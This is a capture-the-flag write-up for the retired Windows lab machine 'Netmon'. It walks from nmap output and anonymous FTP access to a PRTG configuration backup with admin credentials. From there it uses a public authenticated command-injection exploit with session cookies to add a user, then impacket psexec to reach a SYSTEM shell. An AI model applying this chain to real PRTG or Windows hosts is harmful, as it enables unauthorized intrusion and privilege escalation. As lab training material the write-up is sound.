Name: Netmon
Release Date: 02 Mar 2019
Retire Date: 29 Jun 2019
OS: Windows
Base Points: Easy - Retired [0]
Rated Difficulty:
Radar Graph:
Baku 00 days, 02 hours, 01 mins, 53 seconds
snowscan 00 days, 02 hours, 54 mins, 48 seconds
Creator: mrb3n
CherryTree File: CherryTree - Remove the .txt extension

Again, we start with nmap -sC -sV -oA ./netmon

$  nmap -sC -sV -Pn -oA ./netmon
  Starting Nmap 7.80 ( ) at 2020-04-08 08:48 EDT
  Nmap scan report for
  Host is up (0.095s latency).
  Not shown: 995 closed ports
  21/tcp  open  ftp          Microsoft ftpd
  | ftp-anon: Anonymous FTP login allowed (FTP code 230)
  | 02-03-19  12:18AM                 1024 .rnd
  | 02-25-19  10:15PM       <DIR>          inetpub
  | 07-16-16  09:18AM       <DIR>          PerfLogs
  | 02-25-19  10:56PM       <DIR>          Program Files
  | 02-03-19  12:28AM       <DIR>          Program Files (x86)
  | 02-03-19  08:08AM       <DIR>          Users
  |_02-25-19  11:49PM       <DIR>          Windows
  | ftp-syst: 
  |_  SYST: Windows_NT
  80/tcp  open  http         Indy httpd (Paessler PRTG bandwidth monitor)
  |_http-server-header: PRTG/
  | http-title: Welcome | PRTG Network Monitor (NETMON)
  |_Requested resource was /index.htm
  |_http-trane-info: Problem with XML parsing of /evox/about
  135/tcp open  msrpc        Microsoft Windows RPC
  139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
  445/tcp open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
  Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

  Host script results:
  |_clock-skew: mean: 12s, deviation: 0s, median: 11s
  |_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
  | smb-security-mode: 
  |   authentication_level: user
  |   challenge_response: supported
  |_  message_signing: disabled (dangerous, but default)
  | smb2-security-mode: 
  |   2.02: 
  |_    Message signing enabled but not required
  | smb2-time: 
  |   date: 2020-04-08T12:48:59
  |_  start_date: 2020-04-08T12:36:23

  Service detection performed. Please report any incorrect results at .
  Nmap done: 1 IP address (1 host up) scanned in 33.41 seconds

FTP with Anonymous login, HTTP, RPC, and SMB ports are all active.  User flag is hyper simple on this one.  Connect
through FTP and GET the flag from Users\Public\.

Well that was easy.  Let's keep looking around.  In Program Files (x86), we find a PRTG Network Monitor which confirms
the namp findings.  Oddly enough though, there doesn't seem to be anything useful in that folder.  However, PRTG stores
its configuration files under ProgramData, which is a hidden folder.  If we navigate there, we see the Paessler folder,
which contains the configuration files.

So, the path we need is C:\ProgramData\Paessler\"PRTG Network Monitor"\ and we need to GET "PRTG Configuration.old.bak.
Once that is on our machine and open it, we find the PRTG username and password on lines 141 and 142.

Now, we can look at the PRTG portal logging in with prtgadmin:PrTg@dmin2018.  Except, we can't.  Login fails.  Well,
this is a backup set and "year" specific, so let's increment up one and try prtgadmin:PrTg@dmin2019.  Success! What
now?  Well, from the banner in the center of the page, we see there is an update available and the currently installed
version (Installed Version

A little bit of Google-Fu and we discover an authenticated command injection (RCE) vulnerability.

It appears that the vulnerability is such that when a notification is triggered, we can make the system perform unintended functions (like a netcat call or a net user add).  Let's go with adding a user.  To do this we use the PRTG exploit that M4LV0 has created here.  There are some parameters that we need to obtain first.  A quick F12 in your browser will bring up the Developer console.  Select the Storage tab and grab all of the cookie information.  ga; gid; OCTOPUS; all of it.  Then we can run M4LV0's script like this:

 ./ -u -c "_ga=[YOURGA]; _gid=[YOURGID]; OCTOPUS1813713946=[YOUROCTO]"

Now a user has been created on the box and you can use psexec to log in.

 sudo python3 /impacket/examples/ pentest@
  [*] Requesting shares on
  [*] Found writable share ADMIN$
  [*] Uploading file BCvMvYND.exe
  [*] Opening SVCManager on
  [*] Creating service qaYj on
  [*] Starting service qaYj.....
  [!] Press help for extra shell commands
  Microsoft Windows [Version 10.0.14393]
  (c) 2016 Microsoft Corporation. All rights reserved.

  nt authority\system

Grab your flags and celebrate.